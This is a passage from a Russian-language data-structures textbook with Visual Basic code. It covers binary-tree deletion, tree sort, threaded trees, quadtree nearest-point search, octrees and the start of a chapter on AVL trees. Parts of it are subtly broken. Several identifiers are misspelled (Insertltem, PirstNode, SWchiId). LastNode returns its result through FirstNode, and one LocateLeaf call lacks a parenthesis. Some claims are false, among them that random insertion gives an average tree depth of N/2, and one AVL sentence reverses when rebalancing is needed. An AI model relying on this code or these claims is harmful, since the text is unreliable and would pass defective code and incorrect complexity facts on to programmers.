Когда процедура InsertItem рекурсивно вызывает сама себя, она передает указатель на дочерний узел в дереве. Например, в следующих операторах процедура передает указатель на правого потомка узла в качестве параметра узла процедуры InsertItem. Если вызываемая процедура изменяет значение параметра узла, указатель на потомка также автоматически обновляется в вызывающей процедуре. Затем в последней строке кода значение правого потомка устанавливается равным новому значению, так что созданный новый узел добавляется к дереву.
Set child = node.RightChild
Insertltem child, new_value
Set node.RightChild = child
Удаление элементов
Удаление элемента из упорядоченного дерева немного сложнее, чем его вставка. После удаления элемента, программе может понадобиться переупорядочить другие узлы, чтобы соотношение «меньше» продолжало выполняться для всего дерева. При этом нужно рассмотреть несколько случаев.
=====134-135
@Рис. 6.17. Удаление узла с единственным потомком
Вопервых, если у удаляемого узла нет потомков, вы можете просто убрать его из дерева, так как порядок оставшихся узлов при этом не изменится.
Вовторых, если у узла всего один дочерний узел, вы можете поместить его на место удаленного узла. Порядок остальных потомков удаленного узла останется неизменным, поскольку они являются также потомками и дочернего узла. На рис. 6.17 показано дерево, из которого удаляется узел 4, который имеет всего один дочерний узел.
Если удаляемый узел имеет два дочерних, то не обязательно один из них займет место удаленного узла. Если потомки узла также имеют по два дочерних узла, то все потомки не смогут занять место удаленного узла. Удаленный узел имеет одного лишнего потомка, и дочерний узел, который вы хотели бы поместить на его место, также имеет двух потомков, так что на узел пришлось бы три потомка.
Чтобы решить эту проблему, удаленный узел заменяется самым правым узлом из левой ветви. Другими словами, нужно сдвинуться на один шаг вниз по левой ветви, выходившей из удаленного узла. Затем нужно двигаться по правым ветвям вниз до тех пор, пока не найдется узел, который не имеет правой ветви. Это самый правый узел на ветви слева от удаляемого узла. В дереве, показанном слева на рис. 6.18, узел 3 является самым правым узлом в левой от узла 4 ветви. Можно заменить узел 4 листом 3, сохранив при этом порядок дерева.
@Рис. 6.18. Удаление узла, который имеет два дочерних
=======136
@Рис. 6.19. Удаление узла, если заменяющий его узел имеет потомка
Остается последний вариант — когда заменяющий узел имеет левого потомка. В этом случае, вы можете переместить этого потомка на место, освободившееся в результате перемещения замещающего узла, и дерево снова будет расположено в нужном порядке. Уже известно, что самый правый узел не имеет правого потомка, иначе он не был бы таковым. Это означает, что не нужно беспокоиться, не имеет ли замещающий узел двух потомков.
Эта сложная ситуация показана на рис. 6.19. В этом примере удаляется узел 8. Самый правый элемент в его левой ветви — это узел 7, который имеет потомка — узел 5. Чтобы сохранить порядок дерева после удаления узла 8, заменим узел 8 узлом 7, а узел 7 — узлом 5. Заметьте, что узел 7 получает новых потомков, а узел 5 сохраняет своих.
Следующий код удаляет узел из упорядоченного двоичного дерева:
Private Sub DeleteItem(node As SortNode, target_value As Integer)
Dim target As SortNode
Dim child As SortNode
' Если узел не найден, вывести сообщение.
If node Is Nothing Then
Beep
MsgBox "Item " & Format$(target_value) & _
" не найден в дереве."
Exit Sub
End If
If target_value < node.Value Then
' Продолжить для левого поддерева.
Set child = node.LeftChild
DeleteItem child, target_value
Set node.LeftChild = child
ElseIf target_value > node.Value Then
' Продолжить для правого поддерева.
Set child = node.RightChild
DeleteItem child, target_value
Set node.RightChild = child
Else
' Искомый узел найден.
Set target = node
If target.LeftChild Is Nothing Then
' Заменить искомый узел его правым потомком.
Set node = node.RightChild
ElseIf target.RightChild Is Nothing Then
' Заменить искомый узел его левым потомком.
Set node = node.LeftChild
Else
' Вызов подпрограмы ReplaceRightmost для замены
' искомого узла самым правым узлом
' в его левой ветви.
Set child = node.LeftChild
ReplaceRightmost node, child
Set node.LeftChild = child
End If
End If
End Sub
Private Sub ReplaceRightmost(target As SortNode, repl As SortNode)
Dim old_repl As SortNode
Dim child As SortNode
If Not (repl.RightChild Is Nothing) Then
' Продолжить движение вправо и вниз.
Set child = repl.RightChild
ReplaceRightmost target, child
Set repl.RightChild = child
Else
' Достигли дна.
' Запомнить заменяющий узел repl.
Set old_repl = repl
' Заменить узел repl его левым потомком.
Set repl = repl.LeftChild
' Заменить искомый узел target with repl.
Set old_repl.LeftChild = target.LeftChild
Set old_repl.RightChild = target.RightChild
Set target = old_repl
End If
End Sub
======137-138
Алгоритм использует в двух местах прием передачи параметров в рекурсивные подпрограммы по ссылке. Вопервых, подпрограмма DeleteItem использует этот прием для того, чтобы родитель искомого узла указывал на заменяющий узел. Следующие операторы показывают, как вызывается подпрограмма DeleteItem:
Set child = node.LeftChild
DeleteItem child, target_value
Set node.LeftChild = child
Когда процедура обнаруживает искомый узел (узел 8 на рис. 6.19), она получает в качестве параметра узла указатель родителя на искомый узел. Устанавливая параметр на замещающий узел (узел 7), подпрограмма DeleteItem задает дочерний узел для родителя так, чтобы он указывал на новый узел.
Следующие операторы показывают, как процедура ReplaceRightMost рекурсивно вызывает себя:
Set child = repl.RightChild
ReplaceRightmost target, child
Set repl.RightChild = child
Когда процедура находит самый правый узел в левой от удаляемого узла ветви (узел 7), в параметре repl находится указатель родителя на самый правый узел. Когда процедура устанавливает значение repl равным repl.LeftChild, она автоматически соединяет родителя самого правого узла с левым дочерним узлом самого правого узла (узлом 5).
Программа TreeSort использует эти процедуры для работы с упорядоченными двоичными деревьями. Введите целое число, и нажмите на кнопку Add, чтобы добавить элемент к дереву. Введите целое число, и нажмите на кнопку Remove, чтобы удалить этот элемент из дерева. После удаления узла, дерево автоматически переупорядочивается для сохранения порядка «меньше».
Обход упорядоченных деревьев
Полезное свойство упорядоченных деревьев состоит в том, что их порядок совпадает с порядком симметричного обхода. Например, при симметричном обходе дерева, показанного на рис. 6.20, обращение к узлам происходит в порядке 2-4-5-6-7-8-9.
@Рис. 6.20. Симметричный обход упорядоченного дерева: 2, 4, 5, 6, 7, 8, 9
=========139
Это свойство симметричного обхода упорядоченных деревьев приводит к простому алгоритму сортировки:
Добавить элемент к упорядоченному дереву.
Вывести элементы, используя симметричный обход.
Этот алгоритм обычно работает достаточно хорошо. Тем не менее, если добавлять элементы к дереву в определенном порядке, то дерево может стать высоким и тонким. На рис. 6.21 показано упорядоченное дерево, которое получается при добавлении к нему элементов в порядке 1, 6, 5, 2, 3, 4. Другие последовательности также могут приводить к появлению высоких и тонких деревьев.
Чем выше становится упорядоченное дерево, тем больше времени требуется для добавления новых элементов в нижнюю часть дерева. В наихудшем случае, после добавления N элементов, дерево будет иметь высоту порядка O(N). Полное время вставки всех элементов в дерево будет при этом порядка O(N2). Поскольку для обхода дерева требуется время порядка O(N), полное время сортировки чисел с использованием дерева будет равно O(N2)+O(N)=O(N2).
Если дерево остается достаточно коротким, оно имеет высоту порядка O(log(N)). В этом случае для вставки элемента в дерево потребуется всего порядка O(log(N)) шагов. Вставка всех N элементов в дерево потребует порядка O(N * log(N)) шагов. Тогда сортировка элементов при помощи дерева потребует времени порядка O(N * log(N)) + O(N) = O(N * log(N)).
Время выполнения порядка O(N * log(N)) намного меньше, чем O(N2). Например, построение высокого и тонкого дерева, содержащего 1000 элементов, потребует выполнения около миллиона шагов. Построение короткого дерева с высотой порядка O(log(N)) займет всего около 10.000 шагов.
Если элементы первоначально расположены в случайном порядке, форма дерева будет представлять чтото среднее между этими двумя крайними случаями. Хотя его высота может оказаться несколько больше, чем log(N), оно, скорее всего, не будет слишком тонким и высоким, поэтому алгоритм сортировки будет выполняться достаточно быстро.
@Рис. 6.21. Дерево, полученное добавлением элементов в порядке 1, 6, 5, 2, 3, 4
==========140
В 7 главе описываются способы балансировки деревьев, для того, чтобы они не становились слишком высокими и тонкими, независимо от того, в каком порядке в них добавляются новые элементы. Тем не менее, эти методы достаточно сложны, и их не имеет смысла применять в алгоритме сортировки при помощи дерева. Многие из алгоритмов сортировки, описанных в 9 главе, более просты в реализации и обеспечивают при этом лучшую производительность.
Деревья со ссылками
Во 2 главе показано, как добавление ссылок к связным спискам позволяет упростить вывод элементов в разном порядке. Вы можете использовать тот же подход для упрощения обращения к узлам дерева в различном порядке. Например, помещая ссылки в листья двоичного дерева, вы можете облегчить выполнение симметричного и обратного обходов. Для упорядоченного дерева, это обход в прямом и обратном порядке сортировки.
Для создания ссылок, указатели на предыдущий и следующий узлы в порядке симметричного обхода помещаются в неиспользуемых указателях на дочерние узлы. Если не используется указатель на левого потомка, то ссылка записывается на его место, указывая на предыдущий узел при симметричном обходе. Если не используется указатель на правого потомка, то ссылка записывается на его место, указывая на следующий узел при симметричном обходе. Поскольку ссылки симметричны, и ссылки левых потомков указывают на предыдущие, а правых — на следующие узлы, этот тип деревьев называется деревом с симметричными ссылками (symmetrically threaded tree). На рис. 6.22 показано дерево с симметричными ссылками, которые обозначены пунктирными линиями.
Поскольку ссылки занимают место указателей на дочерние узлы дерева, нужно както различать ссылки и обычные указатели на потомков. Проще всего добавить к узлам новые переменные HasLeftChild и HasRightChild типа Boolean, которые будут равны True, если узел имеет левого или правого потомка соответственно.
Чтобы использовать ссылки для поиска предыдущего узла, нужно проверить указатель на левого потомка узла. Если этот указатель является ссылкой, то ссылка указывает на предыдущий узел. Если значение указателя равно Nothing, значит это первый узел дерева, и поэтому он не имеет предшественников. В противном случае, перейдем по указателю к левому дочернему узлу. Затем проследуем по указателям на правый дочерний узел потомков, до тех пор, пока не достигнем узла, в котором на месте указателя на правого потомка находится ссылка. Этот узел (а не тот, на который указывает ссылка) является предшественником исходного узла. Этот узел является самым правым в левой от исходного узла ветви дерева. Следующий код демонстрирует поиск предшественника:
@Рис. 6.22. Дерево с симметричными ссылками
==========141
Private Function Predecessor(node As ThreadedNode) As ThreadedNode Dim child As ThreadedNode
If node.LeftChild Is Nothing Then
' Это первый узел в порядке симметричного обхода.
Set Predecessor = Nothing
Else If node.HasLeftChild Then
' Это указатель на узел.
' Найти самый правый узел в левой ветви.
Set child = node.LeftChild
Do While child.HasRightChild
Set child = child.RightChild
Loop
Set Predecessor = child
Else
' Ссылка указывает на предшественника.
Set Predecessor = node.LeftChild
End If
End Function
Аналогично выполняется поиск следующего узла. Если указатель на правый дочерний узел является ссылкой, то она указывает на следующий узел. Если указатель имеет значение Nothing, то это последний узел дерева, поэтому он не имеет последователя. В противном случае, переходим по указателю к правому потомку узла. Затем перемещаемся по указателям дочерних узлов до тех, пор, пока очередной указатель на левый дочерний узел не окажется ссылкой. Тогда найденный узел будет следующим за исходным. Это будет самый левый узел в правой от исходного узла ветви дерева.
Удобно также ввести функции для нахождения первого и последнего узлов дерева. Чтобы найти первый узел, просто проследуем по указателям на левого потомка вниз от корня до тех пор, пока не достигнем узла, значение указателя на левого потомка для которого равно Nothing. Чтобы найти последний узел, проследуем по указателям на правого потомка вниз от корня до тех пор, пока не достигнем узла, значение указателя на правого потомка для которого равно Nothing.
Private Function FirstNode() As ThreadedNode
Dim node As ThreadedNode
Set node = Root
Do While Not (node.LeftChild Is Nothing)
Set node = node.LeftChild
Loop
Set PirstNode = node
End Function
Private Function LastNode() As ThreadedNode
Dim node As ThreadedNode
Set node = Root
Do While Not (node.RightChild Is Nothing)
Set node = node.RightChild
Loop
Set FirstNode = node
End Function
=========142
При помощи этих функций вы можете легко написать процедуры, которые выводят узлы дерева в прямом или обратном порядке:
Private Sub Inorder()
Dim node As ThreadedNode
' Найти первый узел.
Set node = FirstNode()
' Вывод списка.
Do While Not (node Is Nothing)
Print node.Value
Set node = Successor(node)
Loop
End Sub
Private Sub PrintReverseInorder()
Dim node As ThreadedNode
' Найти последний узел
Set node = LastNode
' Вывод списка.
Do While Not (node Is Nothing)
Print node. Value
Set node = Predecessor(node)
Loop
End Sub
Процедура вывода узлов в порядке симметричного обхода, приведенная ранее в этой главе, использует рекурсию. Для устранения рекурсии вы можете использовать эти новые процедуры, которые не используют ни рекурсию, ни системный стек.
Каждый указатель на дочерние узлы в дереве содержит или указатель на потомка, или ссылку на предшественника или последователя. Так как каждый узел имеет два указателя на дочерние узлы, то, если дерево имеет N узлов, то оно будет содержать 2 * N ссылок и указателей. Эти алгоритмы обхода обращаются ко всем ссылкам и указателям дерева один раз, поэтому они потребуют выполнения O(2 * N) = O(N) шагов.
Можно немного ускорить выполнение этих подпрограмм, если отслеживать указатели на первый и последний узлы дерева. Тогда вам не понадобится выполнять поиск первого и последнего узлов перед тем, как вывести список узлов по порядку. Так как при этом алгоритм обращается ко всем N узлам дерева, время выполнения этого алгоритма также будет порядка O(N), но на практике он будет выполняться немного быстрее.
========143
Работа с деревьями со ссылками
Для работы с деревом со ссылками, нужно, чтобы можно было добавлять и удалять узлы из дерева, сохраняя при этом его структуру.
Предположим, что требуется добавить нового левого потомка узла A. Так как это место не занято, то на месте указателя на левого потомка узла A находится ссылка, которая указывает на предшественника узла A. Поскольку новый узел займет место левого потомка узла A, он станет предшественником узла A. Узел A будет последователем нового узла. Узел, который был предшественником узла A до этого, теперь становится предшественником нового узла. На рис. 6.23 показано дерево с рис. 6.22 после добавления нового узла X в качестве левого потомка узла H.
Если отслеживать указатель на первый и последний узлы дерева, то требуется также проверить, не является ли теперь новый узел первым узлом дерева. Если ссылка на предшественника для нового узла имеет значение Nothing, то это новый первый узел дерева.
@Рис. 6.23. Добавление узла X к дереву со ссылками
=========144
Учитывая все вышеизложенное, легко написать процедуру, которая добавляет нового левого потомка к узлу. Вставка правого потомка выполняется аналогично.
Private Sub AddLeftChild(parent As ThreadedNode, child As ThreadedNode)
' Предшественник родителя становится предшественником нового узла.
Set child. LeftChild = parent.LeftChild
child.HasLeftChild = False
' Вставить узел.
Set parent.LeftChild = child
parent.HasLeftChild = True
' Родитель является последователем нового узла.
Set child.RightChild = parent
child.HasRightChild = False
' Определить, является ли новый узел первым узлом дерева.
If child.LeftChild Is Nothing Then Set FirstNode = child
End Sub
Перед тем, как удалить узел из дерева, необходимо вначале удалить всех его потомков. После этого легко удалить уже сам узел.
Предположим, что удаляемый узел является левым потомком своего родителя. Его указатель на левого потомка является ссылкой, указывающей на предыдущий узел в дереве. После удаления узла, его предшественник становится предшественником родителя удаленного узла. Чтобы удалить узел, просто заменяем указатель на левого потомка его родителя на указатель на левого потомка удаляемого узла.
Указатель на правого потомка удаляемого узла является ссылкой, которая указывает на следующий узел в дереве. Так как удаляемый узел является левым потомком своего родителя, и поскольку у него нет потомков, эта ссылка указывает на родителя, поэтому ее можно просто опустить. На рис. 6.24 показано дерево с рис. 6.23 после удаления узла F. Аналогично удаляется правый потомок.
Private Sub RemoveLeftChild(parent As ThreadedNode)
Dim target As ThreadedNode
Set target = parent.LeftChild
Set parent.LeftChild = target.LeftChild
End Sub
@Рис. 6.24. Удаление узла F из дерева со ссылками
=========145
Квадродеревья
Квадродеревья (quadtrees) описывают пространственные отношения между элементами на площади. Например, это может быть карта, а элементы могут представлять собой положение домов или предприятий на ней.
Каждый узел квадродерева представляет собой участок на площади, представленной квадродеревом. Каждый узел, кроме листьев, имеет четыре потомка, которые представляют четыре квадранта. Листья могут хранить свои элементы в коллекциях связных списков. Следующий код показывает секцию Declarations для класса QtreeNode.
' Потомки.
Public NWchild As QtreeNode
Public NEchild As QtreeNode
Public SWchild As QtreeNode
Public SEchild As QtreeNode
' Элементы узла, если это не лист.
Public Items As New Collection
Элементы, записанные в квадродереве, могут содержать пространственные данные любого типа. Они могут содержать информацию о положении, которую дерево может использовать для поиска элементов. Переменные в простом классе QtreeItem, который представляет элементы, состоящие из точек на местности, определяются так:
Public X As Single
Public Y As Single
Чтобы построить квадродерево, вначале поместим все элементы в корневой узел. Затем определим, содержит ли этот узел достаточно много элементов, чтобы его стоило разделить на несколько узлов. Если это так, создадим четыре потомка узла и распределим элементы между четырьмя потомками в соответствии с их положением в четырех квадрантах исходной области. Затем рекурсивно проверяем, не нужно ли разбить на несколько узлов дочерние узлы. Продолжим разбиение до тех пор, пока все листья не будут содержать не больше некоторого заданного числа элементов.
На рис. 6.25 показано несколько элементов данных, расположенных в виде квадродерева. Каждая область разбивается до тех пор, пока она не будет содержать не более двух элементов.
Квадродеревья удобно применять для поиска близлежащих объектов. Предположим, имеется программа, которая рисует карту с большим числом населенных пунктов. После того, как пользователь щелкнет мышью по карте, программа должна найти ближайший к выбранной точке населенный пункт. Программа может перебрать весь список населенных пунктов, проверяя для каждого его расстояние от заданной точки. Если в списке N элементов, то сложность этого алгоритма порядка O(N).
====146
@Рис. 6.25. Квадродерево
Эту операцию можно выполнить намного быстрее при помощи квадродерева. Начнем с корневого узла. При каждой проверке квадродерева определяем, какой из квадрантов содержит точку, которую выбрал пользователь. Затем спустимся вниз по дереву к соответствующему дочернему узлу. Если пользователь выбрал верхний правый угол области узла, нужно спуститься к северовосточному потомку. Продолжим движение вниз по дереву, пока не дойдем до листа, который содержит выбранную пользователем точку.
Функция LocateLeaf класса QtreeNode использует этот подход для поиска листа дерева, который содержит выбранную точку. Программа может вызвать эту функцию в строке Set the_leaf = Root.LocateLeaf(X, Y, Gxmin, Gxmax, Gymax), где Gxmin, Gxmax, Gymin, Gymax — это границы представленной деревом области.
Public Function LocateLeaf (X As Single, Y As Single, _
xmin As Single, xmax As Single, ymin As Single, ymax As Single) _
As QtreeNode
Dim xmid As Single
Dim ymid As Single
Dim node As QtreeNode
If NWchild Is Nothing Then
' Узел не имеет потомков. Искомый узел найден.
Set LocateLeaf = Me
Exit Function
End If
' Найти соответстующего потомка.
xmid = (xmax + xmin) / 2
ymid = (ymax + ymin) / 2
If X <= xmid Then
If Y <= ymid Then
Set LocateLeaf = NWchild.LocateLeaf( _
X, Y, xmin, xmid, ymin, ymid)
Else
Set LocateLeaf = SWchild.LocateLeaf _
X, Y, xmin, xmid, ymid, ymax)
End If
Else
If Y <= ymid Then
Set LocateLeaf = NEchild.LocateLeaf( _
X, Y, xmid, xmax, ymin, ymid)
Else
Set LocateLeaf = SEchild.LocateLeaf( _
X, Y, xmid, xmax, ymid, ymax)
End If
End If
End Function
После нахождения листа, который содержит точку, проверяем населенные пункты в листе, чтобы найти, который из них ближе всего от выбранной точки. Это делается при помощи процедуры NearPointInLeaf.
Public Sub NearPointInLeaf (X As Single, Y As Single, _
best_item As QtreeItem, best_dist As Single, comparisons As Long)
Dim new_item As QtreeItem
Dim Dx As Single
Dim Dy As Single
Dim new_dist As Single
' Начнем с заведомо плохого решения.
best_dist = 10000000
Set best_item = Nothing
' Остановиться если лист не содержит элементов.
If Items.Count < 1 Then Exit Sub
For Each new_item In Items
comparisons = comparisons + 1
Dx = new_item.X - X
Dy = new_item.Y - Y
new_dist =Dx * Dx + Dy * Dy
If best_dist > new_dist Then
best_dist = new_dist
Set best_item = new_item
End If
Next new_item
End Sub
======147-148
Элемент, который находит процедура NearPointLeaf, обычно и есть элемент, который пользователь пытался выбрать. Тем не менее, если элемент находится вблизи границы между двумя узлами, может оказаться, что ближайший к выбранной точке элемент находится в другом узле.
Предположим, что Dmin — это расстояние между выбранной пользователем точкой и ближайшим из найденных до сих пор населенных пунктов. Если Dmin меньше, чем расстояние от выбранной точки до края листа, то поиск закончен. Населенный пункт находится при этом слишком далеко от края листа, чтобы в какомлибо другом листе мог существовать пункт, расположенный ближе к заданной точке.
В противном случае нужно снова начать с корня и двигаться по дереву, проверяя все узлы квадродеревьев, которые находятся на расстоянии меньше, чем Dmin от заданной точки. Если найдутся элементы, которые расположены ближе, изменим значение Dmin и продолжим поиск. После завершения проверки ближайших к точке листьев, нужный элемент будет найден. Подпрограмма CheckNearByLeaves использует этот подход для завершения поиска.
Public Sub CheckNearbyLeaves(exclude As QtreeNode, _
X As Single, Y As Single, best_item As QtreeItem, _
best_dist As Single, comparisons As Long, _
xmin As Single, xmax As Single, ymin As Single, ymax As Single)
Dim xmid As Single
Dim ymid As Single
Dim new_dist As Single
Dim new_item As QtreeItem
' Если это лист, который мы должны исключить,
' ничего не делать.
If Me Is exclude Then Exit Sub
' Если это лист, проверить его.
If SWchild Is Nothing Then
NearPointInLeaf X, Y, new_item, new_dist, comparisons
If best_dist > new_dist Then
best_dist = new_dist
Set best_item = new_item
End If
Exit Sub
End If
' Найти потомков, которые удалены не больше, чем на best_dist
' от выбранной точки.
xmid = (xmax + xmin) / 2
ymid = (ymax + ymin) / 2
If X - Sqr(best_dist) <= xmid Then
' Продолжаем с потомками на западе.
If Y - Sqr(best_dist) <= ymid Then
' Проверить северо-западного потомка.
NWchild.CheckNearbyLeaves _
exclude, X, Y, best_item, _
best_dist, comparisons, _
xmin, xmid, ymin, ymid
End If
If Y + Sqr(best_dist) > ymid Then
' Проверить юго-западного потомка.
SWchiId.CheckNearbyLeaves _
exclude, X, Y, best_item, _
best_dist, comparisons, _
xmin, xmid, ymid, ymax
End If
End If
If X + Sqr(best_dist) > xmid Then
' Продолжить с потомками на востоке.
If Y - Sqr(best_dist) <= ymid Then
' Проверить северо-восточного потомка.
NEchild.CheckNearbyLeaves _
exclude, X, Y, best_item, _
best_dist, comparisons, _
xmid, xmax, ymin, ymid
End If
If Y + Sqr(best_dist) > ymid Then
' Проверить юговосточного потомка.
SEchild.CheckNearbyLeaves _
exclude, X, Y, best_item, _
best_dist, comparisons, _
xmid, xmax, ymid, ymax
End If
End If
End Sub
=====149-150
Подпрограмма FindPoint использует подпрограммы LocateLeaf, NearPointInLeaf, и CheckNearbyLeaves, из класса QtreeNode для быстрого поиска элемента в квадродереве.
Function FindPoint(X As Single, Y As Single, comparisons As Long) _ As QtreeItem
Dim leaf As QtreeNode
Dim best_item As QtreeItem
Dim best_dist As Single
' Определить, в каком листе находится точка.
Set leaf = Root.LocateLeaf( _
X, Y, Gxmin, Gxmax, Gymin, Gymax)
' Найти ближайшую точку в листе.
leaf.NearPointInLeaf _
X, Y, best_item, best_dist, comparisons
' Проверить соседние листья.
Root.CheckNearbyLeaves _
leaf, X, Y, best_item, best_dist, _
comparisons, Gxmin, Gxmax, Gymin, Gymax
Set FindPoint = best_item
End Function
Программа Qtree использует квадродерево. При старте программа запрашивает число элементов данных, которое она должна создать, затем она создает элементы и рисует их в виде точек. Задавайте вначале небольшое (около 1000) число элементов, пока вы не определите, насколько быстро ваш компьютер может создавать элементы.
Интересно наблюдать квадродеревья, элементы которых распределены неравномерно, поэтому программа выбирает точки при помощи функции странного аттрактора (strange attractor) из теории хаоса (chaos theory). Хотя кажется, что элементы следуют в случайном порядке, они образуют интересные кластеры.
При выборе какойлибо точки на форме при помощи мыши, программа Qtree находит ближайший к ней элемент. Она подсвечивает этот элемент и выводит число проверенных при его поиске элементов.
В меню Options (Опции) программы можно задать, должна ли программа использовать квадродеревья или нет. Если поставить галочку в пункте Use Quadtree (Использовать квадродерево), то программа выводит на экран квадродерево и использует его для поиска элементов. Если этот пункт не выбран, программа не отображает квадродерево и находит нужные элементы путем перебора.
Программа проверяет намного меньшее число элементов и работает намного быстрее при использовании квадродерева. Если этот эффект не слишком заметен на вашем компьютере, запустите программу, задав при старте 10.000 или 20.000 входных элементов. Вы заметите разницу даже на компьютере с процессором Pentium с тактовой частотой 90 МГц.
На рис. 6.26 показано окно программа Qtree на котором изображено 10.000 элементов. Маленький прямоугольник в верхнем правом углу обозначает выбранный элемент. Метка в верхнем левом углу показывает, что программа проверила всего 40 из 10.000 элементов перед тем, как найти нужный.
Изменение MAX_PER_NODE
Интересно поэкспериментировать с программой Qtree, изменяя значение MAX_PER_NODE, определенное в разделе Declarations класса QtreeNode. Это максимальное число элементов, которые могут поместиться в узле квадродерева без его разбиения. Программа обычно использует значение MAX_PER_NODE = 100.
======151
@Рис. 6.26. Программа Qtree
Если вы уменьшите это число, например, до 10, то в каждом узле будет находиться меньше элементов, поэтому программа будет проверять меньше элементов, чтобы найти ближайший к выбранной вами точке. Поиск будет выполняться быстрее. С другой стороны, программе придется создать намного больше узлов квадродерева, поэтому она займет больше памяти.
Наоборот, если вы увеличите MAX_PER_NODE до 1000, программа создаст намного меньше узлов. При этом потребуется больше времени на поиск элементов, но дерево будет меньше, и займет меньше памяти.
Это пример компромисса между временем и пространством. Использование большего числа узлов квадродерева ускоряет поиск, но занимает больше памяти. В этом примере, при значении переменной MAX_PER_NODE примерно равном 100, достигается равновесие между скоростью и использованием памяти. Для других приложений вам может потребоваться поэкспериментировать с различными значениями переменной MAX_PER_NODE, чтобы найти оптимальное.
Использование псевдоуказателей в квадродеревьях
Программа Qtree использует большое число классов и коллекций. Каждый внутренний узел квадродерева содержит четыре ссылки на дочерние узлы. Листья включают большие коллекции, в которых находятся элементы узла. Все эти объекты и коллекции замедляют работу программы, если она содержит большое числе элементов. Создание объектов отнимает много времени и памяти. Если программа создает множество объектов, она может начать обращаться к файлу подкачки, что сильно замедлит ее работу.
К сожалению, выигрыш от использования квадродеревьев будет максимальным, если программа содержит много элементов. Чтобы улучшить производительность больших приложений, вы можете использовать методы работы с псевдоуказателями, описанные во 2 главе.
=====152
Программа Qtree2 создает квадродерево при помощи псевдоуказателей. Узлы и элементы находятся в массивах определенных пользователем структур данных. В качестве указателей, эта программа использует индексы массивов вместо ссылок на объекты. В одном из тестов на компьютере с процессором Pentium с тактовой частотой 90 МГц, программе Qtree потребовалось 25 секунд для построения квадродерева, содержащего 30.000 элементов. Программе Qtree2 понадобилось всего 3 секунды для создания того же дерева.
Восьмеричные деревья
Восьмеричные деревья (octtrees) аналогичны квадродеревьям, но они разбивают область не двумерного, а трехмерного пространства. Восьмеричные деревья содержат не четыре потомка, как квадродеревья, а восемь, разбивая объем области на восемь частей — верхнюю северозападную, нижнюю северозападную, верхнюю северовосточную, нижнюю северовосточную и так далее.
Восьмеричные деревья полезны при работе с объектами, расположенными в пространстве. Например, робот может использовать восьмеричное дерево для отслеживания близлежащих объектов. Программа рейтрейсинга может использовать восьмеричное дерево для того, чтобы быстро оценить, проходит ли луч поблизости от объекта перед тем, как начать медленный процесс вычислений точного пересечения объекта и луча.
Восьмеричные деревья можно строить, используя примерно те же методы, что и для квадродеревьев.
Резюме
Существует множество способов представления деревьев. Наиболее эффективным и компактным из них является запись полных деревьев в массивах. Представление деревьев в виде коллекций дочерних узлов упрощает работу с ними, но при этом программа выполняется медленнее и использует больше памяти. Представление нумерацией связей позволяет быстро выполнять обход дерева и использует меньше памяти, чем коллекции потомков, но его сложно модифицировать. Тем не менее, его важно представлять, потому что оно часто используется в сетевых алгоритмах.
=====153
Глава 7. Сбалансированные деревья
При работе с упорядоченным деревом, вставке и удалении узлов, дерево может стать несбалансированным. Когда это происходит, то алгоритмы, работы с деревом становятся менее эффективными. Если дерево становится сильно несбалансированным, оно практически представляет всего лишь сложную форму связного списка, и программа, использующая такое дерево, может иметь очень низкую производительность.
В этой главе обсуждаются методы, которые можно использовать для балансировки деревьев, даже если узлы удаляются и добавляются с течением времени. Балансировка дерева позволяет ему оставаться при этом достаточно эффективным.
Глава начинается с описания того, что понимается под несбалансированным деревом и демонстрации ухудшения производительности для несбалансированных деревьев. Затем в ней обсуждаются АВЛдеревья, высота левого и правого поддеревьев в каждом узле которых отличается не больше, чем на единицу. Сохраняя это свойство АВЛдеревьев, можно поддерживать такое дерево сбалансированным.
Затем в главе описываются Бдеревья и Б+деревья, в которых все листья имеют одинаковую глубину. Если число ветвей, выходящих из каждого узла находится в определенных пределах, такие деревья остаются сбалансированными. Бдеревья и Б+деревья обычно используются при программировании баз данных. Последняя программа, описанная в этой главе, использует Б+дерево для реализации простой, но достаточно мощной базы данных.
Сбалансированность дерева
Как упоминалось в 6 главе, форма упорядоченного дерева зависит от порядка вставки в него новых узлов. На рис. 7.1 показано два различных дерева, созданных при добавлении одних и тех же элементов в разном порядке.
Высокие и тонкие деревья, такие как левое дерево на рис. 7.1, могут иметь глубину порядка O(N). Вставка или поиск элемента в таком несбалансированном дереве может занимать порядка O(N) шагов. Даже если новые элементы вставляются в дерево в случайном порядке, в среднем они дадут дерево с глубиной N / 2, что также порядка O(N).
Предположим, что строится упорядоченное двоичное дерево, содержащее 1000 узлов. Если дерево сбалансировано, то высота дерева будет порядка log2(1000), или примерно равна 10. Вставка нового элемента в дерево займет всего 10 шагов. Если дерево высокое и тонкое, оно может иметь высоту 1000. В этом случае, вставка элемента в конец дерева займет 1000 шагов.
======155
@Рис. 7.1. Деревья, построенные в различном порядке
Предположим теперь, что мы хотим добавить к дереву еще 1000 узлов. Если дерево остается сбалансированным, то все 1000 узлов поместятся на следующем уровне дерева. При этом для вставки новых элементов потребуется около 10 * 1000 = 10.000 шагов. Если дерево было не сбалансировано и остается таким в процессе роста, то при вставке каждого нового элемента оно будет становиться все выше. Вставка элементов при этом потребует порядка 1000 + 1001 + … +2000 = 1,5 миллиона шагов.
Хотя нельзя быть уверенным, что элементы будут добавляться и удаляться из дерева в нужном порядке, можно использовать методы, которые будут поддерживать сбалансированность дерева, независимо от порядка вставки или удаления элементов.
АВЛдеревья
АВЛдеревья (AVL trees) были названы в честь русских математиков АдельсонаВельского и Лэндиса, которые их изобрели. Для каждого узла АВЛдерева, высота левого и правого поддеревьев отличается не больше, чем на единицу. На рис. 7.2 показано несколько АВЛдеревьев.
Хотя АВЛдерево может быть несколько выше, чем полное дерево с тем же числом узлов, оно также имеет высоту порядка O(log(N)). Это означает, что поиск узла в АВЛдереве занимает время порядка O(log(N)), что достаточно быстро. Не столь очевидно, что можно вставить или удалить элемент из АВЛдерева за время порядка O(log(N)), сохраняя при этом порядок дерева.
======156
@Рис. 7.2. АВЛдеревья
Процедура, которая вставляет в дерево новый узел, рекурсивно спускается вниз по дереву, чтобы найти местоположение узла. После вставки элемента, происходят возвраты из рекурсивных вызовов процедуры и обратный проход вверх по дереву. При каждом возврате из процедуры, она проверяет, сохраняется ли все еще свойство АВЛдеревьев на верхнем уровне. Этот тип обратной рекурсии, когда процедура выполняет важные действия при выходе из цепочки рекурсивных вызовов, называется восходящей (bottomup) рекурсией.
При обратном проходе вверх по дереву, процедура также проверяет, не изменилась ли высота поддерева, с которым она работает. Если процедура доходит до точки, в которой высота поддерева не изменилась, то высота следующих поддеревьев также не могла измениться. В этом случае, снова требуется балансировка дерева, и процедура может закончить проверку.
